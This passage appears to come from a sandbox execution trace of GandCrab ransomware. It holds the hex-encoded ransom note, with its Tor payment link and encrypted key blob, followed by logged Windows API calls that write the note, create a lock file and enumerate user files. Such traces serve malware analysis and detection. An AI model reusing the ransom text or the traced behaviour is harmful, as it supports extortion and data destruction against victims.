4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0085.985] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0085.986] CloseHandle (hObject=0x2b4) returned 1 [0085.986] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.986] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.986] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1f, wMilliseconds=0x133)) [0085.986] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.987] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0085.987] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0085.987] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a09d2ca4deb61a.lock") returned 68 [0085.987] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0085.988] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.988] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.989] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\") returned 44 [0085.989] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\*" [0085.989] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x5034f8 [0085.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.989] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0085.989] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.989] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.989] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0085.989] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0085.989] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0085.989] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\d2ca4a09d2ca4deb61a.lock") 